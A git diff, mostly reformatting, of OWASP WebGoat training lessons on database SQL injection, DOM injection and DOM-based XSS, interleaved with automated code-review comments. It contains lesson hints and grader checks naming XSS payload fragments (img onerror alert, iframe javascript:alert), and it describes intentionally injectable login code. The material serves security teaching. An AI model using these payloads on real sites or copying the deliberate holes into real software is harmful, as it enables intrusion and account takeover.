- setContent(new ElementContainer()); - } - - protected Integer getDefaultRanking() - { - return DEFAULT_RANKING; - } - - - /** - * Gets the title attribute of the CrossSiteScripting object - * - * @return The title value - */ - public String getTitle() - { - return "LAB: DB SQL Injection"; - } - @Override - protected boolean getDefaultHidden() { + public String[] getStages() + { + if (getWebgoatContext().isCodingExercises()) return new String[] { STAGE1, STAGE2 }; + return new String[] { STAGE1 }; + } + + /** + * Gets the instructions attribute of the ParameterInjection object + * + * @return The instructions value + */ + public String getInstructions(WebSession s) + { + String instructions = ""; + + if (!getLessonTracker(s).getCompleted()) + { + String stage = getStage(s); + if (STAGE1.equals(stage)) + { + instructions = "Stage 1: Use String SQL Injection to bypass authentication. " + + "The goal here is to login as the user " + PRIZE_EMPLOYEE_NAME + + ", who is in the Admin group. " + + "You do not have the password, but the form is SQL injectable. " + + "View the EMPLOYEE_LOGIN stored procedure and see if you can " + + "determine why the exploit exists."; + } + else if (STAGE2.equals(stage)) + { + instructions = "Stage 2: Use bind variables.
" + + "Using the Squirrel SQL Client, update the EMPLOYEE_LOGIN stored procedure in the database " + + "to use bind variables, rather than string concatenation. " + + "Repeat the SQL Injection attack. Verify that the attack is no longer effective."; + } + } + + return instructions; + } + + public void handleRequest(WebSession s) + { + if (s.getLessonSession(this) == null) s.openLessonSession(this); + + String requestedActionName = null; + try + { + requestedActionName = s.getParser().getStringParameter("action"); + } catch (ParameterNotFoundException pnfe) + { + // Let them eat login page. + requestedActionName = LOGIN_ACTION; + } + + if (requestedActionName != null) + { + try + { + LessonAction action = getAction(requestedActionName); + if (action != null) + { + // System.out.println("CrossSiteScripting.handleRequest() dispatching to: " + + // action.getActionName()); + if (!action.requiresAuthentication() || action.isAuthenticated(s)) + { + action.handleRequest(s); + // setCurrentAction(s, action.getNextPage(s)); + } + } + else + setCurrentAction(s, ERROR_ACTION); + } catch (ParameterNotFoundException pnfe) + { + System.out.println("Missing parameter"); + pnfe.printStackTrace(); + setCurrentAction(s, ERROR_ACTION); + } catch (ValidationException ve) + { + System.out.println("Validation failed"); + ve.printStackTrace(); + setCurrentAction(s, ERROR_ACTION); + } catch (UnauthenticatedException ue) + { + s.setMessage("Login failed"); + System.out.println("Authentication failure"); + ue.printStackTrace(); + } catch (UnauthorizedException ue2) + { + s.setMessage("You are not authorized to perform this function"); + System.out.println("Authorization failure"); + ue2.printStackTrace(); + } catch (Exception e) + { + // All other errors send the user to the generic error page + System.out.println("handleRequest() error"); + e.printStackTrace(); + setCurrentAction(s, ERROR_ACTION); + } + } + + // All this does for this lesson is ensure that a non-null content exists. 
+ setContent(new ElementContainer()); + } + + protected Integer getDefaultRanking() + { + return DEFAULT_RANKING; + } + + /** + * Gets the title attribute of the CrossSiteScripting object + * + * @return The title value + */ + public String getTitle() + { + return "LAB: DB SQL Injection"; + } + + @Override + protected boolean getDefaultHidden() + { String driver = getWebgoatContext().getDatabaseDriver(); - boolean hidden = ! (driver.contains("oracle") || driver.contains("jtds")); + boolean hidden = !(driver.contains("oracle") || driver.contains("jtds")); return hidden; } - + } \ No newline at end of file diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/DBSQLInjection/Login.java b/main/project/JavaSource/org/owasp/webgoat/lessons/DBSQLInjection/Login.java index d94953ce9..1bcabcb76 100755 --- a/main/project/JavaSource/org/owasp/webgoat/lessons/DBSQLInjection/Login.java +++ b/main/project/JavaSource/org/owasp/webgoat/lessons/DBSQLInjection/Login.java @@ -1,3 +1,4 @@ + package org.owasp.webgoat.lessons.DBSQLInjection; import java.sql.CallableStatement; @@ -7,7 +8,6 @@ import java.sql.Statement; import java.sql.Types; import java.util.List; import java.util.Vector; - import org.owasp.webgoat.lessons.GoatHillsFinancial.DefaultLessonAction; import org.owasp.webgoat.lessons.GoatHillsFinancial.GoatHillsFinancial; import org.owasp.webgoat.lessons.GoatHillsFinancial.LessonAction; 
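Review bot: `handleRequest` in this hunk is line-for-line the same as the one in the DBCrossSiteScripting hunk earlier in this diff (same dispatch on the `action` parameter, same five catch blocks), so the error-handling and authentication-gating logic now lives in two copies that must be kept in sync; unless GoatHillsFinancial already provides it, hoisting it into that base class would remove the duplication. Two smaller points of style: `new Integer(75)` for `DEFAULT_RANKING` can be `Integer.valueOf(75)`, and `getHints` uses raw `List`/`ArrayList` where `List<String>` would let the compiler check the `add` calls. In `getDefaultHidden`, `driver.contains(...)` presumes `getDatabaseDriver()` never returns null — worth confirming against the context implementation or adding a null guard.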
@@ -18,231 +18,209 @@ import org.owasp.webgoat.session.UnauthorizedException; import org.owasp.webgoat.session.ValidationException; import org.owasp.webgoat.session.WebSession; -/******************************************************************************* + +/*************************************************************************************************** * * - * This file is part of WebGoat, an Open Web Application Security Project - * utility. For details, please see http://www.owasp.org/ + * This file is part of WebGoat, an Open Web Application Security Project utility. For details, + * please see http://www.owasp.org/ * * Copyright (c) 2002 - 2007 Bruce Mayhew * - * This program is free software; you can redistribute it and/or modify it under - * the terms of the GNU General Public License as published by the Free Software - * Foundation; either version 2 of the License, or (at your option) any later - * version. + * This program is free software; you can redistribute it and/or modify it under the terms of the + * GNU General Public License as published by the Free Software Foundation; either version 2 of the + * License, or (at your option) any later version. * - * This program is distributed in the hope that it will be useful, but WITHOUT - * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS - * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more - * details. + * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without + * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * General Public License for more details. * - * You should have received a copy of the GNU General Public License along with - * this program; if not, write to the Free Software Foundation, Inc., 59 Temple - * Place - Suite 330, Boston, MA 02111-1307, USA. 
+ * You should have received a copy of the GNU General Public License along with this program; if + * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA + * 02111-1307, USA. * * Getting Source ============== * - * Source for this application is maintained at code.google.com, a repository - * for free software projects. + * Source for this application is maintained at code.google.com, a repository for free software + * projects. * * For details, please see http://code.google.com/p/webgoat/ */ public class Login extends DefaultLessonAction { - private LessonAction chainedAction; + private LessonAction chainedAction; - - public Login(GoatHillsFinancial lesson, String lessonName, String actionName, - LessonAction chainedAction) - { - super(lesson, lessonName, actionName); - this.chainedAction = chainedAction; - } - - - public void handleRequest(WebSession s) throws ParameterNotFoundException, - ValidationException - { - //System.out.println("Login.handleRequest()"); - getLesson().setCurrentAction(s, getActionName()); - - List employees = getAllEmployees(s); - setSessionAttribute(s, getLessonName() + "." - + DBSQLInjection.STAFF_ATTRIBUTE_KEY, employees); - - String employeeId = null; - try + public Login(GoatHillsFinancial lesson, String lessonName, String actionName, LessonAction chainedAction) { - employeeId = s.getParser().getStringParameter( - DBSQLInjection.EMPLOYEE_ID); - String password = s.getParser().getRawParameter( - DBSQLInjection.PASSWORD); + super(lesson, lessonName, actionName); + this.chainedAction = chainedAction; + } - // Attempt authentication - boolean authenticated = login(s, employeeId, password); + public void handleRequest(WebSession s) throws ParameterNotFoundException, ValidationException + { + // System.out.println("Login.handleRequest()"); + getLesson().setCurrentAction(s, getActionName()); - if (authenticated) - { - // Execute the chained Action if authentication succeeded. 
+ List employees = getAllEmployees(s); + setSessionAttribute(s, getLessonName() + "." + DBSQLInjection.STAFF_ATTRIBUTE_KEY, employees); + + String employeeId = null; try { - chainedAction.handleRequest(s); - } - catch (UnauthenticatedException ue1) - { - System.out.println("Internal server error"); - ue1.printStackTrace(); - } - catch (UnauthorizedException ue2) - { - System.out.println("Internal server error"); - ue2.printStackTrace(); - } - } - else - s.setMessage("Login failed"); + employeeId = s.getParser().getStringParameter(DBSQLInjection.EMPLOYEE_ID); + String password = s.getParser().getRawParameter(DBSQLInjection.PASSWORD); - } - catch (ParameterNotFoundException pnfe) - { - // No credentials offered, so we log them out - setSessionAttribute(s, getLessonName() + ".isAuthenticated", - Boolean.FALSE); - } - } + // Attempt authentication + boolean authenticated = login(s, employeeId, password); - - public String getNextPage(WebSession s) - { - String nextPage = DBSQLInjection.LOGIN_ACTION; - - if (isAuthenticated(s)) - nextPage = chainedAction.getNextPage(s); - - return nextPage; - - } - - - public boolean requiresAuthentication() - { - return false; - } - - - public boolean login(WebSession s, String userId, String password) - { - boolean authenticated = false; - - try - { - String call = "{ ? = call EMPLOYEE_LOGIN(?,?) }"; // NB: "call", not "CALL"! Doh! - - try - { - CallableStatement statement = WebSession.getConnection(s) - .prepareCall(call, ResultSet.TYPE_SCROLL_INSENSITIVE, - ResultSet.CONCUR_READ_ONLY); - statement.registerOutParameter(1, Types.INTEGER); - statement.setInt(2, Integer.parseInt(userId)); - statement.setString(3, password); - statement.execute(); - - int rows = statement.getInt(1); - if (rows > 0) { - setSessionAttribute(s, - getLessonName() + ".isAuthenticated", Boolean.TRUE); - setSessionAttribute(s, getLessonName() + "." 
- + DBSQLInjection.USER_ID, userId); - authenticated = true; - if (DBSQLInjection.STAGE1.equals(getStage(s)) && - DBSQLInjection.PRIZE_EMPLOYEE_ID == Integer.parseInt(userId)) - { - setStageComplete(s, DBSQLInjection.STAGE1); - } - } else { - - if (DBSQLInjection.STAGE2.equals(getStage(s))) + if (authenticated) + { + // Execute the chained Action if authentication succeeded. + try { - try - { - String call2 = "{ ? = call EMPLOYEE_LOGIN_BACKUP(?,?) }"; - statement = WebSession.getConnection(s) - .prepareCall(call2, ResultSet.TYPE_SCROLL_INSENSITIVE, - ResultSet.CONCUR_READ_ONLY); - statement.registerOutParameter(1, Types.INTEGER); - statement.setInt(2, Integer.parseInt(userId)); - statement.setString(3, password); - statement.execute(); - - rows = statement.getInt(1); - if (rows > 0) - setStageComplete(s, DBSQLInjection.STAGE2); - } - catch (SQLException sqle2){} + chainedAction.handleRequest(s); + } catch (UnauthenticatedException ue1) + { + System.out.println("Internal server error"); + ue1.printStackTrace(); + } catch (UnauthorizedException ue2) + { + System.out.println("Internal server error"); + ue2.printStackTrace(); } } - } - catch (SQLException sqle) - { - s.setMessage("Error logging in: " + sqle.getLocalizedMessage()); - sqle.printStackTrace(); - } - } - catch (Exception e) - { - s.setMessage("Error logging in: " + e.getLocalizedMessage()); - e.printStackTrace(); - } + else + s.setMessage("Login failed"); - //System.out.println("Lesson login result: " + authenticated); - return authenticated; - } - - public List getAllEmployees(WebSession s) - { - List employees = new Vector(); - - // Query the database for all roles the given employee belongs to - // Query the database for all employees "owned" by these roles - - try - { - String query = "SELECT employee.userid,first_name,last_name,role FROM employee,roles " - + "where employee.userid=roles.userid"; - - try - { - Statement answer_statement = WebSession.getConnection(s) - 
.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, - ResultSet.CONCUR_READ_ONLY); - ResultSet answer_results = answer_statement.executeQuery(query); - answer_results.beforeFirst(); - while (answer_results.next()) + } catch (ParameterNotFoundException pnfe) { - int employeeId = answer_results.getInt("userid"); - String firstName = answer_results.getString("first_name"); - String lastName = answer_results.getString("last_name"); - String role = answer_results.getString("role"); - EmployeeStub stub = new EmployeeStub(employeeId, firstName, - lastName, role); - employees.add(stub); + // No credentials offered, so we log them out + setSessionAttribute(s, getLessonName() + ".isAuthenticated", Boolean.FALSE); } - } - catch (SQLException sqle) - { - s.setMessage("Error getting employees"); - sqle.printStackTrace(); - } - } - catch (Exception e) - { - s.setMessage("Error getting employees"); - e.printStackTrace(); } - return employees; - } + public String getNextPage(WebSession s) + { + String nextPage = DBSQLInjection.LOGIN_ACTION; + + if (isAuthenticated(s)) nextPage = chainedAction.getNextPage(s); + + return nextPage; + + } + + public boolean requiresAuthentication() + { + return false; + } + + public boolean login(WebSession s, String userId, String password) + { + boolean authenticated = false; + + try + { + String call = "{ ? = call EMPLOYEE_LOGIN(?,?) }"; // NB: "call", not "CALL"! Doh! + + try + { + CallableStatement statement = WebSession.getConnection(s) + .prepareCall(call, ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY); + statement.registerOutParameter(1, Types.INTEGER); + statement.setInt(2, Integer.parseInt(userId)); + statement.setString(3, password); + statement.execute(); + + int rows = statement.getInt(1); + if (rows > 0) + { + setSessionAttribute(s, getLessonName() + ".isAuthenticated", Boolean.TRUE); + setSessionAttribute(s, getLessonName() + "." 
+ DBSQLInjection.USER_ID, userId); + authenticated = true; + if (DBSQLInjection.STAGE1.equals(getStage(s)) + && DBSQLInjection.PRIZE_EMPLOYEE_ID == Integer.parseInt(userId)) + { + setStageComplete(s, DBSQLInjection.STAGE1); + } + } + else + { + + if (DBSQLInjection.STAGE2.equals(getStage(s))) + { + try + { + String call2 = "{ ? = call EMPLOYEE_LOGIN_BACKUP(?,?) }"; + statement = WebSession.getConnection(s).prepareCall(call2, + ResultSet.TYPE_SCROLL_INSENSITIVE, + ResultSet.CONCUR_READ_ONLY); + statement.registerOutParameter(1, Types.INTEGER); + statement.setInt(2, Integer.parseInt(userId)); + statement.setString(3, password); + statement.execute(); + + rows = statement.getInt(1); + if (rows > 0) setStageComplete(s, DBSQLInjection.STAGE2); + } catch (SQLException sqle2) + { + } + } + } + } catch (SQLException sqle) + { + s.setMessage("Error logging in: " + sqle.getLocalizedMessage()); + sqle.printStackTrace(); + } + } catch (Exception e) + { + s.setMessage("Error logging in: " + e.getLocalizedMessage()); + e.printStackTrace(); + } + + // System.out.println("Lesson login result: " + authenticated); + return authenticated; + } + + public List getAllEmployees(WebSession s) + { + List employees = new Vector(); + + // Query the database for all roles the given employee belongs to + // Query the database for all employees "owned" by these roles + + try + { + String query = "SELECT employee.userid,first_name,last_name,role FROM employee,roles " + + "where employee.userid=roles.userid"; + + try + { + Statement answer_statement = WebSession.getConnection(s) + .createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY); + ResultSet answer_results = answer_statement.executeQuery(query); + answer_results.beforeFirst(); + while (answer_results.next()) + { + int employeeId = answer_results.getInt("userid"); + String firstName = answer_results.getString("first_name"); + String lastName = answer_results.getString("last_name"); + String role = 
answer_results.getString("role"); + EmployeeStub stub = new EmployeeStub(employeeId, firstName, lastName, role); + employees.add(stub); + } + } catch (SQLException sqle) + { + s.setMessage("Error getting employees"); + sqle.printStackTrace(); + } + } catch (Exception e) + { + s.setMessage("Error getting employees"); + e.printStackTrace(); + } + + return employees; + } } diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/DOMInjection.java b/main/project/JavaSource/org/owasp/webgoat/lessons/DOMInjection.java index 45faa4561..d0d80a185 100644 --- a/main/project/JavaSource/org/owasp/webgoat/lessons/DOMInjection.java +++ b/main/project/JavaSource/org/owasp/webgoat/lessons/DOMInjection.java @@ -1,9 +1,9 @@ + package org.owasp.webgoat.lessons; import java.io.PrintWriter; import java.util.ArrayList; import java.util.List; - import org.apache.ecs.Element; import org.apache.ecs.ElementContainer; import org.apache.ecs.StringElement; 
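Review bot: The STAGE2 backup path in `login()` keeps an empty `catch (SQLException sqle2) { }`, so a failure calling `EMPLOYEE_LOGIN_BACKUP` is dropped without a trace and the stage cannot be diagnosed; at minimum mirror the outer handler with `sqle2.printStackTrace();` or set a session message. The `CallableStatement` in `login()` and the `Statement`/`ResultSet` in `getAllEmployees()` are never closed on either the success or the error path, which leaks JDBC handles from the shared connection on every login attempt; a `finally` that closes them (or try-with-resources if the build targets Java 7+) would cover both methods. `Integer.parseInt(userId)` is evaluated before the statement is prepared, so a non-numeric employee id surfaces as the generic "Error logging in" message from the outer `catch (Exception e)` rather than as a validation failure — presumably acceptable for the lesson, but a one-line comment saying so would stop the next reader from treating it as a bug.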
@@ -16,175 +16,156 @@ import org.apache.ecs.html.TR; import org.apache.ecs.html.Table; import org.owasp.webgoat.session.WebSession; -/******************************************************************************* + +/*************************************************************************************************** * * - * This file is part of WebGoat, an Open Web Application Security Project - * utility. For details, please see http://www.owasp.org/ + * This file is part of WebGoat, an Open Web Application Security Project utility. For details, + * please see http://www.owasp.org/ * * Copyright (c) 2002 - 2007 Bruce Mayhew * - * This program is free software; you can redistribute it and/or modify it under - * the terms of the GNU General Public License as published by the Free Software - * Foundation; either version 2 of the License, or (at your option) any later - * version. + * This program is free software; you can redistribute it and/or modify it under the terms of the + * GNU General Public License as published by the Free Software Foundation; either version 2 of the + * License, or (at your option) any later version. * - * This program is distributed in the hope that it will be useful, but WITHOUT - * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS - * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more - * details. + * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without + * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * General Public License for more details. * - * You should have received a copy of the GNU General Public License along with - * this program; if not, write to the Free Software Foundation, Inc., 59 Temple - * Place - Suite 330, Boston, MA 02111-1307, USA. 
+ * You should have received a copy of the GNU General Public License along with this program; if + * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA + * 02111-1307, USA. * * Getting Source ============== * - * Source for this application is maintained at code.google.com, a repository - * for free software projects. + * Source for this application is maintained at code.google.com, a repository for free software + * projects. * * For details, please see http://code.google.com/p/webgoat/ * - * @author Sherif Koussa Macadamian Technologies. - * @created October 28, 2006 + * @author Sherif Koussa Macadamian Technologies. + * @created October 28, 2006 */ public class DOMInjection extends LessonAdapter { - private final static Integer DEFAULT_RANKING = new Integer(10); + private final static Integer DEFAULT_RANKING = new Integer(10); - private final static String KEY = "key"; + private final static String KEY = "key"; - private final static IMG MAC_LOGO = new IMG("images/logos/macadamian.gif").setAlt( - "Macadamian Technologies").setBorder(0).setHspace(0).setVspace(0); + private final static IMG MAC_LOGO = new IMG("images/logos/macadamian.gif").setAlt("Macadamian Technologies") + .setBorder(0).setHspace(0).setVspace(0); - protected Element createContent(WebSession s) - { - - String key = "K1JFWP8BSO8HI52LNPQS8F5L01N"; - ElementContainer ec = new ElementContainer(); - - try + protected Element createContent(WebSession s) { - String userKey = s.getParser().getRawParameter(KEY, ""); - String fromAJAX = s.getParser().getRawParameter("from", ""); - if (fromAJAX.equalsIgnoreCase("ajax") && userKey.length() != 0 - && userKey.equals(key)) - { - s.getResponse().setContentType("text/html"); - s.getResponse().setHeader("Cache-Control", "no-cache"); - PrintWriter out = new PrintWriter(s.getResponse() - .getOutputStream()); - out.print("document.forms[0].SUBMIT.disabled = false;"); - out.flush(); - out.close(); + + String key = 
"K1JFWP8BSO8HI52LNPQS8F5L01N"; + ElementContainer ec = new ElementContainer(); + + try + { + String userKey = s.getParser().getRawParameter(KEY, ""); + String fromAJAX = s.getParser().getRawParameter("from", ""); + if (fromAJAX.equalsIgnoreCase("ajax") && userKey.length() != 0 && userKey.equals(key)) + { + s.getResponse().setContentType("text/html"); + s.getResponse().setHeader("Cache-Control", "no-cache"); + PrintWriter out = new PrintWriter(s.getResponse().getOutputStream()); + out.print("document.forms[0].SUBMIT.disabled = false;"); + out.flush(); + out.close(); + return ec; + } + if (s.getRequest().getMethod().equalsIgnoreCase("POST")) + { + makeSuccess(s); + } + } catch (Exception e) + { + s.setMessage("Error generating " + this.getClass().getName()); + e.printStackTrace(); + } + + String lineSep = System.getProperty("line.separator"); + String script = "" + lineSep; + + ec.addElement(new StringElement(script)); + ec.addElement(new BR().addElement(new H1().addElement("Welcome to WebGoat Registration Page:"))); + ec.addElement(new BR() + .addElement("Please enter the license key that was emailed to you to start using the application.")); + ec.addElement(new BR()); + ec.addElement(new BR()); + Table t1 = new Table().setCellSpacing(0).setCellPadding(0).setBorder(0).setWidth("70%").setAlign("center"); + + TR tr = new TR(); + tr.addElement(new TD(new StringElement("License Key: "))); + + Input input1 = new Input(Input.TEXT, KEY, ""); + input1.addAttribute("onkeyup", "validate();"); + tr.addElement(new TD(input1)); + t1.addElement(tr); + + tr = new TR(); + tr.addElement(new TD(" ").setColSpan(2)); + + t1.addElement(tr); + + tr = new TR(); + Input b = new Input(); + b.setType(Input.SUBMIT); + b.setValue("Activate!"); + b.setName("SUBMIT"); + b.setDisabled(true); + tr.addElement(new TD(" ")); + tr.addElement(new TD(b)); + + t1.addElement(tr); + ec.addElement(t1); + return ec; - } - if (s.getRequest().getMethod().equalsIgnoreCase("POST")) - { - makeSuccess(s); - } } - 
catch (Exception e) + + public Element getCredits() { - s.setMessage("Error generating " + this.getClass().getName()); - e.printStackTrace(); + return super.getCustomCredits("Created by Sherif Koussa ", MAC_LOGO); } - String lineSep = System.getProperty("line.separator"); - String script = "" + lineSep; + protected Category getDefaultCategory() + { - ec.addElement(new StringElement(script)); - ec.addElement(new BR().addElement(new H1() - .addElement("Welcome to WebGoat Registration Page:"))); - ec - .addElement(new BR() - .addElement("Please enter the license key that was emailed to you to start using the application.")); - ec.addElement(new BR()); - ec.addElement(new BR()); - Table t1 = new Table().setCellSpacing(0).setCellPadding(0).setBorder(0) - .setWidth("70%").setAlign("center"); + return Category.AJAX_SECURITY; + } - TR tr = new TR(); - tr.addElement(new TD(new StringElement("License Key: "))); + protected Integer getDefaultRanking() + { - Input input1 = new Input(Input.TEXT, KEY, ""); - input1.addAttribute("onkeyup", "validate();"); - tr.addElement(new TD(input1)); - t1.addElement(tr); + return DEFAULT_RANKING; + } - tr = new TR(); - tr.addElement(new TD(" ").setColSpan(2)); + protected List getHints(WebSession s) + { - t1.addElement(tr); + List hints = new ArrayList(); + hints.add("This page is using XMLHTTP to comunicate with the server."); + hints.add("Try to find a way to inject the DOM to enable the Activate button."); + hints.add("Intercept the reply and replace the body with document.forms[0].SUBMIT.disabled = false;"); + return hints; + } - tr = new TR(); - Input b = new Input(); - b.setType(Input.SUBMIT); - b.setValue("Activate!"); - b.setName("SUBMIT"); - b.setDisabled(true); - tr.addElement(new TD(" ")); - tr.addElement(new TD(b)); - - t1.addElement(tr); - ec.addElement(t1); - - return ec; - } - - - public Element getCredits() - { - return super.getCustomCredits("Created by Sherif Koussa ", MAC_LOGO); - } - - - protected Category 
getDefaultCategory() - { - - return Category.AJAX_SECURITY; - } - - - protected Integer getDefaultRanking() - { - - return DEFAULT_RANKING; - } - - - protected List getHints(WebSession s) - { - - List hints = new ArrayList(); - hints.add("This page is using XMLHTTP to comunicate with the server."); - hints.add("Try to find a way to inject the DOM to enable the Activate button."); - hints.add("Intercept the reply and replace the body with document.forms[0].SUBMIT.disabled = false;"); - return hints; - } - - - public String getTitle() - { - return "DOM Injection"; - } + public String getTitle() + { + return "DOM Injection"; + } } diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/DOMXSS.java b/main/project/JavaSource/org/owasp/webgoat/lessons/DOMXSS.java index ee9526357..332ae8f2f 100644 --- a/main/project/JavaSource/org/owasp/webgoat/lessons/DOMXSS.java +++ b/main/project/JavaSource/org/owasp/webgoat/lessons/DOMXSS.java @@ -1,3 +1,4 @@ + package org.owasp.webgoat.lessons; import java.io.BufferedReader; @@ -6,7 +7,6 @@ import java.io.FileReader; import java.io.IOException; import java.util.ArrayList; import java.util.List; - import org.apache.ecs.Element; import org.apache.ecs.ElementContainer; import org.apache.ecs.StringElement; 
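Review bot: In `createContent`, the AJAX branch writes a JavaScript statement to the response but labels it `text/html` via `s.getResponse().setContentType("text/html")`; since the client evaluates the body as script, `application/javascript` (with a charset) would be the accurate type and avoids the reply being treated as markup by intermediaries. The same branch closes the response stream with `out.close()` and then returns `ec` to the framework; whether the caller still attempts to render `ec` after the stream is closed is not visible in this hunk. Minor: `System.getProperty("line.separator")` can be `System.lineSeparator()` on Java 7+, `getHints` still builds a raw `List`/`ArrayList`, and the hint text has a typo, `comunicate` → `communicate`.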
@@ -18,31 +18,40 @@ import org.apache.ecs.html.Input; import org.apache.ecs.html.Script; import org.owasp.webgoat.session.*; -public class DOMXSS extends SequentialLessonAdapter { - public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com").addElement(new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0).setVspace(0)); +public class DOMXSS extends SequentialLessonAdapter +{ + public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com") + .addElement( + new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0) + .setVspace(0)); private final static String PERSON = "person"; /** - * Description of the Method - * - * @param s Description of the Parameter - * @return Description of the Return Value + * Description of the Method + * + * @param s + * Description of the Parameter + * @return Description of the Return Value */ - protected Element createContent(WebSession s) { + protected Element createContent(WebSession s) + { return super.createStagedContent(s); } - protected Element doStage1(WebSession s) throws Exception { + protected Element doStage1(WebSession s) throws Exception + { ElementContainer ec = new ElementContainer(); StringBuffer attackString = new StringBuffer(s.getParser().getStringParameter(PERSON, "")); ec.addElement(mainContent(s)); - if (attackString.toString().toLowerCase().indexOf("img") != -1&& attackString.toString().toLowerCase().indexOf("images/logos/owasp.jpg") != -1) { + if (attackString.toString().toLowerCase().indexOf("img") != -1 + && attackString.toString().toLowerCase().indexOf("images/logos/owasp.jpg") != -1) + { getLessonTracker(s).setStage(2); s.setMessage("Stage 1 completed. "); } 
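Review bot: The Javadoc on `createContent` is still the generator placeholder (`Description of the Method` / `Description of the Parameter`), which the reformat preserved rather than replaced; a one-liner such as `Delegates to the staged-lesson renderer; the per-stage logic lives in doStage1..doStage5.` with `@param s the current WebSession` would make it useful. In `doStage1` (and likewise `doStage2`–`doStage4` in the following hunks) the parameter is wrapped in a `StringBuffer` only to call `toString().toLowerCase()` on it once per sub-condition; computing it once, `String attack = s.getParser().getStringParameter(PERSON, "").toLowerCase();`, and testing `attack.indexOf(...)` keeps the conditions readable and drops the repeated allocations. `toLowerCase()` without a `Locale` is locale-sensitive (under a Turkish default locale `"IMG"` lower-cases to a dotless i and the `img` check fails); `toLowerCase(Locale.ROOT)` would need a `java.util.Locale` import.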
@@ -50,14 +59,18 @@ public class DOMXSS extends SequentialLessonAdapter { return (ec); } - protected Element doStage2(WebSession s) throws Exception { + protected Element doStage2(WebSession s) throws Exception + { ElementContainer ec = new ElementContainer(); StringBuffer attackString = new StringBuffer(s.getParser().getStringParameter(PERSON, "")); ec.addElement(mainContent(s)); - if (attackString.toString().toLowerCase().indexOf("img") != -1 && attackString.toString().toLowerCase().indexOf("onerror") != -1 && attackString.toString().toLowerCase().indexOf("alert") != -1) { + if (attackString.toString().toLowerCase().indexOf("img") != -1 + && attackString.toString().toLowerCase().indexOf("onerror") != -1 + && attackString.toString().toLowerCase().indexOf("alert") != -1) + { getLessonTracker(s).setStage(3); s.setMessage("Stage 2 completed. "); } 
@@ -65,28 +78,34 @@ public class DOMXSS extends SequentialLessonAdapter { return (ec); } - protected Element doStage3(WebSession s) throws Exception { + protected Element doStage3(WebSession s) throws Exception + { ElementContainer ec = new ElementContainer(); StringBuffer attackString = new StringBuffer(s.getParser().getStringParameter(PERSON, "")); ec.addElement(mainContent(s)); - if (attackString.toString().toLowerCase().indexOf("iframe") != -1 && attackString.toString().toLowerCase().indexOf("javascript:alert") != -1) { + if (attackString.toString().toLowerCase().indexOf("iframe") != -1 + && attackString.toString().toLowerCase().indexOf("javascript:alert") != -1) + { getLessonTracker(s).setStage(4); s.setMessage("Stage 3 completed."); } return (ec); } - protected Element doStage4(WebSession s) throws Exception { + protected Element doStage4(WebSession s) throws Exception + { ElementContainer ec = new ElementContainer(); StringBuffer attackString = new StringBuffer(s.getParser().getStringParameter(PERSON, "")); ec.addElement(mainContent(s)); - if (attackString.toString().toLowerCase().indexOf("please enter your password:") != -1&& attackString.toString().toLowerCase().indexOf("javascript:alert") != -1) { + if (attackString.toString().toLowerCase().indexOf("please enter your password:") != -1 + && attackString.toString().toLowerCase().indexOf("javascript:alert") != -1) + { getLessonTracker(s).setStage(5); s.setMessage("Stage 4 completed."); } 
@@ -94,20 +113,21 @@ public class DOMXSS extends SequentialLessonAdapter { return (ec); } - protected Element doStage5(WebSession s) throws Exception { + protected Element doStage5(WebSession s) throws Exception + { ElementContainer ec = new ElementContainer(); ec.addElement(mainContent(s)); /** * They pass iff: - * + * * 1. If the DOMXSS.js file contains the lines "escapeHTML(name)" */ String file = s.getWebResource("javascript/DOMXSS.js"); String content = getFileContent(file); - if(content.indexOf("escapeHTML(name)") != -1) + if (content.indexOf("escapeHTML(name)") != -1) { makeSuccess(s); } @@ -115,11 +135,13 @@ public class DOMXSS extends SequentialLessonAdapter { return ec; } - protected ElementContainer mainContent(WebSession s) { + protected ElementContainer mainContent(WebSession s) + { StringBuffer attackString = null; ElementContainer ec = new ElementContainer(); - try { + try + { ec.addElement(new Script().setSrc("javascript/DOMXSS.js")); @@ -139,7 +161,8 @@ public class DOMXSS extends SequentialLessonAdapter { Element b = ECSFactory.makeButton("Submit Solution"); ec.addElement(b); - } catch (Exception e) { + } catch (Exception e) + { s.setMessage("Error generating " + this.getClass().getName()); e.printStackTrace(); } @@ -148,11 +171,12 @@ public class DOMXSS extends SequentialLessonAdapter { } /** - * Gets the hints attribute of the HelloScreen object - * - * @return The hints value + * Gets the hints attribute of the HelloScreen object + * + * @return The hints value */ - public List getHints(WebSession s) { + public List getHints(WebSession s) + { List hints = new ArrayList(); hints.add("Try entering the following: " + "<IMG SRC=\"images/logos/owasp.jpg\"/>"); 
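Review bot: `doStage5` passes the stage as soon as `escapeHTML(name)` appears anywhere in `DOMXSS.js`, and because `getFileContent` joins lines with no separator a commented-out `// escapeHTML(name)` satisfies `content.indexOf("escapeHTML(name)") != -1` exactly as a live call does; if that matters for grading, match line by line and skip lines whose stripped form starts with `//`. The `/** They pass iff: ... */` block inside the method body is a Javadoc-style comment on a statement; a `//` or `/* */` comment keeps it out of Javadoc tooling. `getFileContent`'s body is in a later hunk.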
